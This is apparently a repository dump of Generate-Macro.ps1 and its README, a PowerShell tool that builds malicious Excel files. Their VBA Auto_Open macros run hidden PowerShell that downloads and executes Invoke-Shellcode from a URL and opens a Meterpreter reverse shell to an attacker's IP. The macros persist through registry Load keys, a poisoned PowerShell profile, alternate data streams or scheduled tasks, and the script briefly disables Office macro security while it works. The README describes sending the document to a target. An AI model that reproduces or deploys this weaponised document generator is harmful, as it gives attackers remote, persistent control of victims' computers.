├── Generate-Macro.ps1 └── README.md /Generate-Macro.ps1: -------------------------------------------------------------------------------- 1 | #Coded by Matt Nelson (@enigma0x3) 2 | <# 3 | .SYNOPSIS 4 | Standalone Powershell script that will generate a malicious Microsoft Office document with a specified payload and persistence method 5 | 6 | .DESCRIPTION 7 | This script will generate malicious Microsoft Excel Documents that contain VBA macros. This script will prompt you for your attacking IP 8 | (the one you will receive your shell at), the port you want your shell at, and the name of the document. From there, the script will then 9 | display a menu of different attacks, all with different persistence methods. Once an attack is chosen, it will then prompt you for your payload type 10 | (Only HTTP and HTTPS are supported). 11 | 12 | When naming the document, don't include a file extension. 13 | 14 | These attacks use Invoke-Shellcode, which was created by Matt Graeber. Follow him on Twitter --> @mattifestation 15 | 16 | PowerSploit Function: Invoke-Shellcode 17 | Author: Matthew Graeber (@mattifestation) 18 | License: BSD 3-Clause 19 | Required Dependencies: None 20 | Optional Dependencies: None 21 | 22 | 23 | .Attack Types 24 | Meterpreter Shell with Logon Persistence: This attack delivers a meterpreter shell and then persists in the registry 25 | by creating a hidden .vbs file in C:\Users\Public and then creates a registry key in HKCU\Software\Microsoft\Windows NT\CurrentVersion\Windows\Load 26 | that executes the .vbs file on login. 27 | 28 | Meterpreter Shell with Powershell Profile Persistence: This attack requires the target user to have admin right but is quite creative. It will 29 | deliver you a shell and then drop a malicious .vbs file in C:\Users\Default\AppData\Roaming\Microsoft\Windows\Cookies\cookie.vbs. Once dropped, it creates 30 | an infected Powershell Profile file in C:\Windows\SysNative\WindowsPowerShell\v1.0\ and then creates a registry key in 31 | HKCU\Software\Microsoft\Windows NT\CurrentVersion\Windows\Load that executes Powershell.exe on startup. Since the Powershell profile loads automatically when 32 | Powershell.exe is invoked, your code is executed automatically. 33 | 34 | Meterpreter Shell with Alternate Data Stream Persistence: This attack will give you a shell and then persists my creating 2 alternate data streams attached to the AppData 35 | folder. It then creates a registry key that parses the Alternate Data Streams and runs the Base64 encoded payload. 36 | 37 | Meterpreter Shell with Scheduled Task Persistence: This attack will give you a shell and then persist by creating a scheduled task with the action set to 38 | the set payload. 39 | 40 | 41 | .EXAMPLE 42 | PS> ./Generate-Macro.ps1 43 | Enter IP Address: 10.0.0.10 44 | Enter Port Number: 1111 45 | Enter the name of the document (Do not include a file extension): FinancialData 46 | 47 | --------Select Attack--------- 48 | 1. Meterpreter Shell with Logon Persistence 49 | 2. Meterpreter Shell with Powershell Profile Persistence (Requires user to be local admin) 50 | 3. Meterpreter Shell with Alternate Data Stream Persistence 51 | 4. Meterpreter Shell with Scheduled Task Persistence 52 | ------------------------------ 53 | Select Attack Number & Press Enter: 1 54 | 55 | --------Select Payload--------- 56 | 1. Meterpreter Reverse HTTPS 57 | 2. Meterpreter Reverse HTTP 58 | ------------------------------ 59 | Select Payload Number & Press Enter: 1 60 | Saved to file C:\Users\Malware\Desktop\FinancialData.xls 61 | PS> 62 | 63 | 64 | 65 | 66 | #> 67 | $global:defLoc = "$env:userprofile\Desktop" 68 | $global:IS_Url = Read-Host "Enter URL of Invoke-Shellcode script (If you use GitHub, use the raw version)" 69 | $global:IP = Read-Host "Enter IP Address" 70 | $global:Port = Read-Host "Enter Port Number" 71 | $global:Name = Read-Host "Enter the name of the document (Do not include a file extension)" 72 | $global:Name = $global:Name + ".xls" 73 | $global:FullName = "$global:defLoc\$global:Name" 74 | 75 | function Registry-Persistence { 76 | <# 77 | .SYNOPSIS 78 | Uses registry to persist after reboot 79 | .DESCRIPTION 80 | Drops a hidden VBS file and creates a registry key to execute is on startup 81 | #> 82 | #create macro 83 | 84 | $Code = @" 85 | Sub Auto_Open() 86 | Execute 87 | Persist 88 | Reg 89 | Start 90 | 91 | End Sub 92 | 93 | Public Function Execute() As Variant 94 | Const HIDDEN_WINDOW = 0 95 | strComputer = "." 96 | Set objWMIService = GetObject("winmgmts:\\" & strComputer & "\root\cimv2") 97 | 98 | Set objStartup = objWMIService.Get("Win32_ProcessStartup") 99 | Set objConfig = objStartup.SpawnInstance_ 100 | objConfig.ShowWindow = HIDDEN_WINDOW 101 | Set objProcess = GetObject("winmgmts:\\" & strComputer & "\root\cimv2:Win32_Process") 102 | objProcess.Create "powershell.exe -WindowStyle Hidden -noprofile -noexit -c IEX ((New-Object Net.WebClient).DownloadString('$global:IS_Url')); Invoke-Shellcode -Payload $Payload -Lhost $global:IP -Lport $global:Port -Force", Null, objConfig, intProcessID 103 | End Function 104 | 105 | Public Function Persist() As Variant 106 | Set fs = CreateObject("Scripting.FileSystemObject") 107 | Set a = fs.CreateTextFile("C:\Users\Public\config.txt", True) 108 | a.WriteLine ("Dim objShell") 109 | a.WriteLine ("Set objShell = WScript.CreateObject(""WScript.Shell"")") 110 | a.WriteLine ("command = ""C:\WINDOWS\system32\WindowsPowerShell\v1.0\powershell.exe -WindowStyle Hidden -nop -noexit -c IEX ((New-Object Net.WebClient).DownloadString('$global:IS_Url')); Invoke-Shellcode -Payload $Payload -Lhost $global:IP -Lport $global:Port -Force""") 111 | a.WriteLine ("objShell.Run command,0") 112 | a.WriteLine ("Set objShell = Nothing") 113 | a.Close 114 | GivenLocation = "C:\Users\Public\" 115 | OldFileName = "config.txt" 116 | NewFileName = "config.vbs" 117 | Name GivenLocation & OldFileName As GivenLocation & NewFileName 118 | SetAttr "C:\Users\Public\config.vbs", vbHidden 119 | End Function 120 | 121 | Public Function Reg() As Variant 122 | Set WshShell = CreateObject("WScript.Shell") 123 | WshShell.RegWrite "HKCU\Software\Microsoft\Windows NT\CurrentVersion\Windows\Load", "C:\Users\Public\config.vbs", "REG_SZ" 124 | Set WshShell = Nothing 125 | 126 | End Function 127 | 128 | Public Function Start() As Variant 129 | Const HIDDEN_WINDOW = 0 130 | strComputer = "." 131 | Shell "wscript C:\Users\Public\config.vbs", vbNormalFocus 132 | 133 | End Function 134 | "@ 135 | 136 | 137 | 138 | #Create excel document 139 | $Excel01 = New-Object -ComObject "Excel.Application" 140 | $ExcelVersion = $Excel01.Version 141 | 142 | #Disable Macro Security 143 | New-ItemProperty -Path "HKCU:\Software\Microsoft\Office\$ExcelVersion\Excel\Security" -Name AccessVBOM -PropertyType DWORD -Value 1 -Force | Out-Null 144 | New-ItemProperty -Path "HKCU:\Software\Microsoft\Office\$ExcelVersion\Excel\Security" -Name VBAWarnings -PropertyType DWORD -Value 1 -Force | Out-Null 145 | 146 | 147 | $Excel01.DisplayAlerts = $false 148 | $Excel01.DisplayAlerts = "wdAlertsNone" 149 | $Excel01.Visible = $false 150 | $Workbook01 = $Excel01.Workbooks.Add(1) 151 | $Worksheet01 = $Workbook01.WorkSheets.Item(1) 152 | 153 | $ExcelModule = $Workbook01.VBProject.VBComponents.Add(1) 154 | $ExcelModule.CodeModule.AddFromString($Code) 155 | 156 | 157 | 158 | 159 | #Save the document 160 | Add-Type -AssemblyName Microsoft.Office.Interop.Excel 161 | $Workbook01.SaveAs("$global:FullName", [Microsoft.Office.Interop.Excel.XlFileFormat]::xlExcel8) 162 | Write-Output "Saved to file $global:Fullname" 163 | 164 | #Cleanup 165 | $Excel01.Workbooks.Close() 166 | $Excel01.Quit() 167 | [System.Runtime.Interopservices.Marshal]::ReleaseComObject($Excel01) | out-null 168 | $Excel01 = $Null 169 | if (ps excel){kill -name excel} 170 | 171 | #Enable Macro Security 172 | New-ItemProperty -Path "HKCU:\Software\Microsoft\Office\$ExcelVersion\Excel\Security" -Name AccessVBOM -PropertyType DWORD -Value 0 -Force | Out-Null 173 | New-ItemProperty -Path "HKCU:\Software\Microsoft\Office\$ExcelVersion\Excel\Security" -Name VBAWarnings -PropertyType DWORD -Value 0 -Force | Out-Null 174 | 175 | #Create Clean-up Script 176 | New-Item $env:userprofile\Desktop\RegistryCleanup.ps1 -type file | Out-Null 177 | $RegistryCleanup = @' 178 | if(Test-Path "C:\Users\Public\config.vbs"){ 179 | try{ 180 | Remove-Item "C:\Users\Public\config.vbs" -Force 181 | Write-Host "[*]Successfully Removed config.vbs from C:\Users\Public"}catch{Write-Host "[!]Unable to remove config.vbs from C:\Users\Public"} 182 | }else{Write-Host "[!]Path not valid"} 183 | $Reg = "HKCU:\Software\Microsoft\Windows NT\CurrentVersion\Windows" 184 | $RegQuery = Get-ItemProperty $Reg | Select-Object "Load" 185 | if($RegQuery.Load -eq "C:\Users\Public\config.vbs"){ 186 | try{ 187 | Remove-ItemProperty -Path $Reg -Name "Load" 188 | Write-Host "[*]Successfully Removed Malicious Load entry from HKCU\Software\Microsoft\Windows NT\CurrentVersion\Windows"}catch{Write-Host "[!]Unable to remove Registry Entry"} 189 | }else{Write-Host "[!]Path not valid"} 190 | '@ 191 | Add-Content $env:userprofile\Desktop\RegistryCleanup.ps1 $RegistryCleanup 192 | Write-Host "Clean-up Script located at $env:userprofile\Desktop\RegistryCleanup.ps1" 193 | 194 | 195 | } 196 | 197 | function PowerShellProfile-Persistence{ 198 | 199 | $Code = @" 200 | 'Coded by Matt Nelson 201 | 'twitter.com/enigma0x3 202 | 'enigma0x3.wordpress.com 203 | 204 | Sub Auto_Open() 205 | 206 | Execute 207 | WriteWrapper 208 | WriteProfile 209 | Reg 210 | 211 | 212 | End Sub 213 | 214 | Public Function Execute() As Variant 215 | Const HIDDEN_WINDOW = 0 216 | strComputer = "." 217 | Set objWMIService = GetObject("winmgmts:\\" & strComputer & "\root\cimv2") 218 | 219 | Set objStartup = objWMIService.Get("Win32_ProcessStartup") 220 | Set objConfig = objStartup.SpawnInstance_ 221 | objConfig.ShowWindow = HIDDEN_WINDOW 222 | Set objProcess = GetObject("winmgmts:\\" & strComputer & "\root\cimv2:Win32_Process") 223 | objProcess.Create "powershell.exe -WindowStyle Hidden -noprofile -noexit -c IEX ((New-Object Net.WebClient).DownloadString('$global:IS_Url')); Invoke-Shellcode -Payload $Payload -Lhost $global:IP -Lport $global:Port -Force", Null, objConfig, intProcessID 224 | End Function 225 | 226 | Public Function WriteWrapper() As Variant 227 | Set fs = CreateObject("Scripting.FileSystemObject") 228 | Set a = fs.CreateTextFile("C:\Users\Default\AppData\Roaming\Microsoft\Windows\Cookies\cookie.txt", True) 229 | a.WriteLine ("Dim objShell") 230 | a.WriteLine ("Set objShell = WScript.CreateObject(""WScript.Shell"")") 231 | a.WriteLine ("command = ""C:\WINDOWS\system32\WindowsPowerShell\v1.0\powershell.exe""") 232 | a.WriteLine ("objShell.Run command,0") 233 | a.WriteLine ("Set objShell = Nothing") 234 | a.Close 235 | GivenLocation = "C:\Users\Default\AppData\Roaming\Microsoft\Windows\Cookies\" 236 | OldFileName = "cookie.txt" 237 | NewFileName = "cookie.vbs" 238 | Name GivenLocation & OldFileName As GivenLocation & NewFileName 239 | SetAttr "C:\Users\Default\AppData\Roaming\Microsoft\Windows\Cookies\cookie.vbs", vbHidden 240 | 241 | End Function 242 | 243 | Public Function WriteProfile() As Variant 244 | Set fs = CreateObject("Scripting.FileSystemObject") 245 | Set a = fs.CreateTextFile("C:\Windows\SysNative\WindowsPowerShell\v1.0\Profile.txt", True) 246 | a.WriteLine ("IEX ((New-Object Net.WebClient).DownloadString('$global:IS_Url')); Invoke-Shellcode -Payload $Payload -Lhost $global:IP -Lport $global:Port -Force") 247 | a.Close 248 | GivenLocation = "C:\Windows\SysNative\WindowsPowerShell\v1.0\" 249 | OldFileName = "Profile.txt" 250 | NewFileName = "Profile.ps1" 251 | Name GivenLocation & OldFileName As GivenLocation & NewFileName 252 | SetAttr "C:\Windows\SysNative\WindowsPowerShell\v1.0\Profile.ps1", vbHidden 253 | End Function 254 | 255 | Public Function Reg() As Variant 256 | Set WshShell = CreateObject("WScript.Shell") 257 | WshShell.RegWrite "HKCU\Software\Microsoft\Windows NT\CurrentVersion\Windows\Load", "C:\Users\Default\AppData\Roaming\Microsoft\Windows\Cookies\cookie.vbs", "REG_SZ" 258 | Set WshShell = Nothing 259 | 260 | End Function 261 | 262 | "@ 263 | 264 | 265 | 266 | #Create excel document 267 | $Excel01 = New-Object -ComObject "Excel.Application" 268 | $ExcelVersion = $Excel01.Version 269 | 270 | #Disable Macro Security 271 | New-ItemProperty -Path "HKCU:\Software\Microsoft\Office\$ExcelVersion\Excel\Security" -Name AccessVBOM -PropertyType DWORD -Value 1 -Force | Out-Null 272 | New-ItemProperty -Path "HKCU:\Software\Microsoft\Office\$ExcelVersion\Excel\Security" -Name VBAWarnings -PropertyType DWORD -Value 1 -Force | Out-Null 273 | 274 | 275 | $Excel01.DisplayAlerts = $false 276 | $Excel01.DisplayAlerts = "wdAlertsNone" 277 | $Excel01.Visible = $false 278 | $Workbook01 = $Excel01.Workbooks.Add(1) 279 | $Worksheet01 = $Workbook01.WorkSheets.Item(1) 280 | 281 | 282 | 283 | $ExcelModule = $Workbook01.VBProject.VBComponents.Add(1) 284 | $ExcelModule.CodeModule.AddFromString($Code) 285 | 286 | 287 | #Save the document 288 | Add-Type -AssemblyName Microsoft.Office.Interop.Excel 289 | $Workbook01.SaveAs("$global:FullName", [Microsoft.Office.Interop.Excel.XlFileFormat]::xlExcel8) 290 | Write-Output "Saved to file $global:Fullname" 291 | 292 | #Cleanup 293 | $Excel01.Workbooks.Close() 294 | $Excel01.Quit() 295 | [System.Runtime.Interopservices.Marshal]::ReleaseComObject($Excel01) | out-null 296 | $Excel01 = $Null 297 | if (ps excel){kill -name excel} 298 | 299 | #Enable Macro Security 300 | New-ItemProperty -Path "HKCU:\Software\Microsoft\Office\$ExcelVersion\Excel\Security" -Name AccessVBOM -PropertyType DWORD -Value 0 -Force | Out-Null 301 | New-ItemProperty -Path "HKCU:\Software\Microsoft\Office\$ExcelVersion\Excel\Security" -Name VBAWarnings -PropertyType DWORD -Value 0 -Force | Out-Null 302 | 303 | #Create Clean-up Script 304 | New-Item $env:userprofile\Desktop\PowerShellProfileCleanup.ps1 -type file | Out-Null 305 | $PowerShellProfileCleanup = @' 306 | if(Test-Path "C:\Users\Default\AppData\Roaming\Microsoft\Windows\Cookies\cookie.vbs"){ 307 | try{ 308 | Remove-Item "C:\Users\Default\AppData\Roaming\Microsoft\Windows\Cookies\cookie.vbs" -Force 309 | Write-Host "[*]Successfully Removed cookie.vbs from C:\Users\Default\AppData\Roaming\Microsoft\Windows\Cookies"}catch{Write-Host "[!]Unable to remove cookie.vbs from C:\Users\Default\AppData\Roaming\Microsoft\Windows\Cookies"} 310 | }else{Write-Host "[!]Path not valid"} 311 | if(Test-Path "C:\Windows\System32\WindowsPowerShell\v1.0\Profile.ps1"){ 312 | try{ 313 | Remove-Item "C:\Windows\System32\WindowsPowerShell\v1.0\Profile.ps1" -Force 314 | Write-Host "[*]Successfully Removed Profile.ps1 from C:\Windows\System32\WindowsPowerShell\v1.0"}catch{Write-Host "[!]Unable to remove Profile.ps1 from C:\Windows\System32\WindowsPowerShell\v1.0"} 315 | }else{Write-Host "[!]Path not valid"} 316 | $Reg = "HKCU:\Software\Microsoft\Windows NT\CurrentVersion\Windows" 317 | $RegQuery = Get-ItemProperty $Reg | Select-Object "Load" 318 | if($RegQuery.Load -eq "C:\Users\Default\AppData\Roaming\Microsoft\Windows\Cookies\cookie.vbs"){ 319 | try{ 320 | Remove-ItemProperty -Path $Reg -Name "Load" 321 | Write-Host "[*]Successfully Removed Malicious Load entry from HKCU\Software\Microsoft\Windows NT\CurrentVersion\Windows"}catch{Write-Host "[!]Unable to remove Registry Entry"} 322 | }else{Write-Host "[!]Path not valid"} 323 | '@ 324 | Add-Content $env:userprofile\Desktop\PowerShellProfileCleanup.ps1 $PowerShellProfileCleanup 325 | Write-Host "Clean-up Script located at $env:userprofile\Desktop\PowerShellProfileCleanup.ps1" 326 | } 327 | 328 | function SchTaskPersistence{ 329 | $TimeDelay = Read-Host "Enter User Idle Time before the task runs" 330 | $TaskName = Read-Host "Enter the name you want the task to be called" 331 | $Code = @" 332 | 'Coded by Matt Nelson 333 | 'twitter.com/enigma0x3 334 | 'enigma0x3.wordpress.com 335 | 336 | Sub Auto_Open() 337 | 338 | Execute 339 | Persist 340 | 341 | 342 | End Sub 343 | 344 | Public Function Execute() As Variant 345 | Const HIDDEN_WINDOW = 0 346 | strComputer = "." 347 | Set objWMIService = GetObject("winmgmts:\\" & strComputer & "\root\cimv2") 348 | 349 | Set objStartup = objWMIService.Get("Win32_ProcessStartup") 350 | Set objConfig = objStartup.SpawnInstance_ 351 | objConfig.ShowWindow = HIDDEN_WINDOW 352 | Set objProcess = GetObject("winmgmts:\\" & strComputer & "\root\cimv2:Win32_Process") 353 | objProcess.Create "powershell.exe -WindowStyle Hidden -noprofile -noexit -c IEX ((New-Object Net.WebClient).DownloadString('$global:IS_Url')); Invoke-Shellcode -Payload $Payload -Lhost $global:IP -Lport $global:Port -Force", Null, objConfig, intProcessID 354 | End Function 355 | 356 | 357 | Public Function Persist() As Variant 358 | Const HIDDEN_WINDOW = 0 359 | strComputer = "." 360 | Set objWMIService = GetObject("winmgmts:\\" & strComputer & "\root\cimv2") 361 | 362 | Set objStartup = objWMIService.Get("Win32_ProcessStartup") 363 | Set objConfig = objStartup.SpawnInstance_ 364 | objConfig.ShowWindow = HIDDEN_WINDOW 365 | Set objProcess = GetObject("winmgmts:\\" & strComputer & "\root\cimv2:Win32_Process") 366 | objProcess.Create "Powershell.exe -WindowStyle Hidden -nop -noexit -c Invoke-Command -ScriptBlock { schtasks /create /TN $TaskName /TR 'powershell.exe -WindowStyle hidden -noexit -c ''IEX ((New-Object Net.WebClient).DownloadString(''''$global:IS_Url''''''))''; Invoke-Shellcode -Payload $Payload -Lhost $global:IP -Lport $global:Port -Force' /SC onidle /i $TimeDelay}", Null, objConfig, intProcessID 367 | End Function 368 | 369 | 370 | "@ 371 | 372 | 373 | 374 | #Create excel document 375 | $Excel01 = New-Object -ComObject "Excel.Application" 376 | $ExcelVersion = $Excel01.Version 377 | 378 | #Disable Macro Security 379 | New-ItemProperty -Path "HKCU:\Software\Microsoft\Office\$ExcelVersion\Excel\Security" -Name AccessVBOM -PropertyType DWORD -Value 1 -Force | Out-Null 380 | New-ItemProperty -Path "HKCU:\Software\Microsoft\Office\$ExcelVersion\Excel\Security" -Name VBAWarnings -PropertyType DWORD -Value 1 -Force | Out-Null 381 | 382 | 383 | $Excel01.DisplayAlerts = $false 384 | $Excel01.DisplayAlerts = "wdAlertsNone" 385 | $Excel01.Visible = $false 386 | $Workbook01 = $Excel01.Workbooks.Add(1) 387 | $Worksheet01 = $Workbook01.WorkSheets.Item(1) 388 | 389 | 390 | 391 | $ExcelModule = $Workbook01.VBProject.VBComponents.Add(1) 392 | $ExcelModule.CodeModule.AddFromString($Code) 393 | 394 | 395 | #Save the document 396 | Add-Type -AssemblyName Microsoft.Office.Interop.Excel 397 | $Workbook01.SaveAs("$global:FullName", [Microsoft.Office.Interop.Excel.XlFileFormat]::xlExcel8) 398 | Write-Output "Saved to file $global:Fullname" 399 | 400 | #Cleanup 401 | $Excel01.Workbooks.Close() 402 | $Excel01.Quit() 403 | [System.Runtime.Interopservices.Marshal]::ReleaseComObject($Excel01) | out-null 404 | $Excel01 = $Null 405 | 406 | #Enable Macro Security 407 | New-ItemProperty -Path "HKCU:\Software\Microsoft\Office\$ExcelVersion\Excel\Security" -Name AccessVBOM -PropertyType DWORD -Value 0 -Force | Out-Null 408 | New-ItemProperty -Path "HKCU:\Software\Microsoft\Office\$ExcelVersion\Excel\Security" -Name VBAWarnings -PropertyType DWORD -Value 0 -Force | Out-Null 409 | 410 | #Create Clean-up Script 411 | New-Item $env:userprofile\Desktop\SchTaskCleanup.ps1 -type file | Out-Null 412 | $SchTaskCleanup = @" 413 | `$TaskName = "$TaskName" 414 | `$CheckTask = SCHTASKS /QUERY /TN $TaskName 415 | try{ 416 | SCHTASKS /Delete /TN $TaskName /F 417 | }catch{Write-Host "[!]Unable to remove malicious task named $TaskName"} 418 | "@ 419 | Add-Content $env:userprofile\Desktop\SchTaskCleanup.ps1 $SchTaskCleanup 420 | Write-Host "Clean-up Script located at $env:userprofile\Desktop\SchTaskCleanup.ps1" 421 | } 422 | 423 | 424 | function AltDS-Persistence{ 425 | $AltDSURL = Read-Host "Enter URL of hosted Alternate Data Stream Persistence Script" 426 | 427 | $Code = @" 428 | 'Coded by Matt Nelson 429 | 'twitter.com/enigma0x3 430 | 'enigma0x3.wordpress.com 431 | 432 | Sub Auto_Open() 433 | 434 | Execute 435 | ADSPersist 436 | 437 | 438 | End Sub 439 | 440 | Public Function Execute() As Variant 441 | Const HIDDEN_WINDOW = 0 442 | strComputer = "." 443 | Set objWMIService = GetObject("winmgmts:\\" & strComputer & "\root\cimv2") 444 | 445 | Set objStartup = objWMIService.Get("Win32_ProcessStartup") 446 | Set objConfig = objStartup.SpawnInstance_ 447 | objConfig.ShowWindow = HIDDEN_WINDOW 448 | Set objProcess = GetObject("winmgmts:\\" & strComputer & "\root\cimv2:Win32_Process") 449 | objProcess.Create "powershell.exe -WindowStyle Hidden -noprofile -noexit -c IEX ((New-Object Net.WebClient).DownloadString('$global:IS_Url')); Invoke-Shellcode -Payload $Payload -Lhost $global:IP -Lport $global:Port -Force", Null, objConfig, intProcessID 450 | End Function 451 | 452 | Public Function ADSPersist() As Variant 453 | Const HIDDEN_WINDOW = 0 454 | strComputer = "." 455 | Set objWMIService = GetObject("winmgmts:\\" & strComputer & "\root\cimv2") 456 | 457 | Set objStartup = objWMIService.Get("Win32_ProcessStartup") 458 | Set objConfig = objStartup.SpawnInstance_ 459 | objConfig.ShowWindow = HIDDEN_WINDOW 460 | Set objProcess = GetObject("winmgmts:\\" & strComputer & "\root\cimv2:Win32_Process") 461 | objProcess.Create "powershell.exe -WindowStyle Hidden -noprofile -noexit -c IEX ((New-Object Net.WebClient).DownloadString('$AltDSURL')); Invoke-ADSBackdoor -URL $global:IS_Url -Arguments 'Invoke-Shellcode -Payload $Payload -LHost $global:IP -LPort $global:Port -Force'", Null, objConfig, intProcessID 462 | End Function 463 | 464 | 465 | 466 | "@ 467 | 468 | 469 | 470 | #Create excel document 471 | $Excel01 = New-Object -ComObject "Excel.Application" 472 | $ExcelVersion = $Excel01.Version 473 | 474 | #Disable Macro Security 475 | New-ItemProperty -Path "HKCU:\Software\Microsoft\Office\$ExcelVersion\Excel\Security" -Name AccessVBOM -PropertyType DWORD -Value 1 -Force | Out-Null 476 | New-ItemProperty -Path "HKCU:\Software\Microsoft\Office\$ExcelVersion\Excel\Security" -Name VBAWarnings -PropertyType DWORD -Value 1 -Force | Out-Null 477 | 478 | 479 | $Excel01.DisplayAlerts = $false 480 | $Excel01.DisplayAlerts = "wdAlertsNone" 481 | $Excel01.Visible = $false 482 | $Workbook01 = $Excel01.Workbooks.Add(1) 483 | $Worksheet01 = $Workbook01.WorkSheets.Item(1) 484 | 485 | 486 | 487 | $ExcelModule = $Workbook01.VBProject.VBComponents.Add(1) 488 | $ExcelModule.CodeModule.AddFromString($Code) 489 | 490 | 491 | #Save the document 492 | Add-Type -AssemblyName Microsoft.Office.Interop.Excel 493 | $Workbook01.SaveAs("$global:FullName", [Microsoft.Office.Interop.Excel.XlFileFormat]::xlExcel8) 494 | Write-Output "Saved to file $global:Fullname" 495 | 496 | #Cleanup 497 | $Excel01.Workbooks.Close() 498 | $Excel01.Quit() 499 | [System.Runtime.Interopservices.Marshal]::ReleaseComObject($Excel01) | out-null 500 | $Excel01 = $Null 501 | if (ps excel){kill -name excel} 502 | 503 | #Enable Macro Security 504 | New-ItemProperty -Path "HKCU:\Software\Microsoft\Office\$ExcelVersion\Excel\Security" -Name AccessVBOM -PropertyType DWORD -Value 0 -Force | Out-Null 505 | New-ItemProperty -Path "HKCU:\Software\Microsoft\Office\$ExcelVersion\Excel\Security" -Name VBAWarnings -PropertyType DWORD -Value 0 -Force | Out-Null 506 | 507 | #Create Clean-up Script 508 | New-Item $env:userprofile\Desktop\AltDSCleanup.ps1 -type file | Out-Null 509 | $AltDSCleanup = @' 510 | function Remove-ADS { 511 | <# 512 | .SYNOPSIS 513 | Removes an alterate data stream from a specified location. 514 | P/Invoke code adapted from PowerSploit's Mayhem.psm1 module. 515 | Author: @harmj0y, @mattifestation 516 | License: BSD 3-Clause 517 | 518 | .LINK 519 | https://github.com/mattifestation/PowerSploit/blob/master/Mayhem/Mayhem.psm1 520 | 521 | #> 522 | [CmdletBinding()] Param( 523 | [Parameter(Mandatory=$True)] 524 | [string]$ADSPath 525 | ) 526 | 527 | #region define P/Invoke types dynamically 528 | # stolen from PowerSploit https://github.com/mattifestation/PowerSploit/blob/master/Mayhem/Mayhem.psm1 529 | $DynAssembly = New-Object System.Reflection.AssemblyName('Win32') 530 | $AssemblyBuilder = [AppDomain]::CurrentDomain.DefineDynamicAssembly($DynAssembly, [Reflection.Emit.AssemblyBuilderAccess]::Run) 531 | $ModuleBuilder = $AssemblyBuilder.DefineDynamicModule('Win32', $False) 532 | 533 | $TypeBuilder = $ModuleBuilder.DefineType('Win32.Kernel32', 'Public, Class') 534 | $DllImportConstructor = [Runtime.InteropServices.DllImportAttribute].GetConstructor(@([String])) 535 | $SetLastError = [Runtime.InteropServices.DllImportAttribute].GetField('SetLastError') 536 | $SetLastErrorCustomAttribute = New-Object Reflection.Emit.CustomAttributeBuilder($DllImportConstructor, 537 | @('kernel32.dll'), 538 | [Reflection.FieldInfo[]]@($SetLastError), 539 | @($True)) 540 | 541 | # Define [Win32.Kernel32]::DeleteFile 542 | $PInvokeMethod = $TypeBuilder.DefinePInvokeMethod('DeleteFile', 543 | 'kernel32.dll', 544 | ([Reflection.MethodAttributes]::Public -bor [Reflection.MethodAttributes]::Static), 545 | [Reflection.CallingConventions]::Standard, 546 | [Bool], 547 | [Type[]]@([String]), 548 | [Runtime.InteropServices.CallingConvention]::Winapi, 549 | [Runtime.InteropServices.CharSet]::Ansi) 550 | $PInvokeMethod.SetCustomAttribute($SetLastErrorCustomAttribute) 551 | 552 | $Kernel32 = $TypeBuilder.CreateType() 553 | 554 | $Result = $Kernel32::DeleteFile($ADSPath) 555 | 556 | if ($Result){ 557 | Write-Verbose "Alternate Data Stream at $ADSPath successfully removed." 558 | } 559 | else{ 560 | Write-Verbose "Alternate Data Stream at $ADSPath removal failure!" 561 | } 562 | 563 | $Result 564 | } 565 | 566 | 567 | function Remove-ADSBackdoor { 568 | <# 569 | .SYNOPSIS 570 | Removes the backdoor installed by Invoke-ADSBackdoor. 571 | 572 | .DESCRIPTION 573 | This function will remove the persistence installed by Invoke-ADSBackdoor by parsing 574 | the run registry run key, removing the alternate data stream files, and then 575 | removing the registry key. 576 | #> 577 | 578 | # get the VBS trigger command/file location from the registry 579 | $trigger = (gp HKCU:\Software\Microsoft\Windows\CurrentVersion\Run Update).Update 580 | $vbsFile = $trigger.split(" ")[1] 581 | $getWrapperADS = {cmd /C "more < $vbsFile"} 582 | $wrapper = Invoke-Command -ScriptBlock $getWrapperADS 583 | 584 | if ($wrapper -match 'i in \((.+?)\)') 585 | { 586 | # extract out the payload .txt file location 587 | $textFile = $matches[1] 588 | if($( Remove-ADS $textFile)){ 589 | "Successfully removed payload file $textFile" 590 | } 591 | else{ 592 | "[!] Error in removing payload file $textFile" 593 | } 594 | 595 | } 596 | else{ 597 | "[!] Error: couldn't extract PowerShell script location from VBS wrapper $vbsFile" 598 | } 599 | 600 | if($(Remove-ADS $vbsFile)){ 601 | "Successfully removed wrapper file $vbsFile" 602 | } 603 | else{ 604 | "[!] Error in removing payload file $textFile" 605 | } 606 | 607 | # remove the registry run key 608 | Remove-ItemProperty -Force -Path HKCU:Software\Microsoft\Windows\CurrentVersion\Run\ -Name Update; 609 | "Successfully removed Malicious Update entry from HKCU:Software\Microsoft\Windows\CurrentVersion\Run" 610 | } 611 | Remove-ADSBackdoor 612 | '@ 613 | Add-Content $env:userprofile\Desktop\AltDSCleanup.ps1 $AltDSCleanup 614 | Write-Host "Clean-up Script located at $env:userprofile\Desktop\AltDSCleanup.ps1" 615 | } 616 | 617 | 618 | 619 | #Determine Attack 620 | Do { 621 | Write-Host " 622 | --------Select Attack--------- 623 | 1. Meterpreter Shell with Logon Persistence 624 | 2. Meterpreter Shell with Powershell Profile Persistence (Requires user to be local admin) 625 | 3. Meterpreter Shell with Alternate Data Stream Persistence 626 | 4. Meterpreter Shell with Scheduled Task Persistence 627 | ------------------------------" 628 | $AttackNum = Read-Host -prompt "Select Attack Number & Press Enter" 629 | } until ($AttackNum -eq "1" -or $AttackNum -eq "2" -or $AttackNum -eq "3" -or $AttackNum -eq "4") 630 | 631 | 632 | 633 | #Determine payload 634 | Do { 635 | Write-Host " 636 | --------Select Payload--------- 637 | 1. Meterpreter Reverse HTTPS 638 | 2. Meterpreter Reverse HTTP 639 | ------------------------------" 640 | $PayloadNum = Read-Host -prompt "Select Payload Number & Press Enter" 641 | } until ($PayloadNum -eq "1" -or $PayloadNum -eq "2") 642 | 643 | if($PayloadNum -eq "1"){ 644 | $Payload = "windows/meterpreter/reverse_https"} 645 | elseif($PayloadNum -eq "2"){ 646 | $Payload = "windows/meterpreter/reverse_http"} 647 | 648 | #Initiate Attack Choice 649 | 650 | if($AttackNum -eq "1"){ 651 | Registry-Persistence} 652 | elseif($AttackNum -eq "2"){ 653 | PowerShellProfile-Persistence 654 | } 655 | elseif($AttackNum -eq "3"){ 656 | AltDS-Persistence 657 | } 658 | elseif($AttackNum -eq "4"){ 659 | SchTaskPersistence 660 | } 661 | -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 |

Coded by Matt Nelson (@enigma0x3)

2 | 3 |

SYNOPSIS

4 | Generate-Macro is a standalone PowerShell script that will generate a malicious Microsoft Office document with a specified payload and persistence method. 5 | 6 | [!] This script will temporarily disable 2 macro security settings while creating the document. 7 | [!] The idea is to generate your malicious document on a development box you OWN and use that document to send to a target. 8 | 9 |

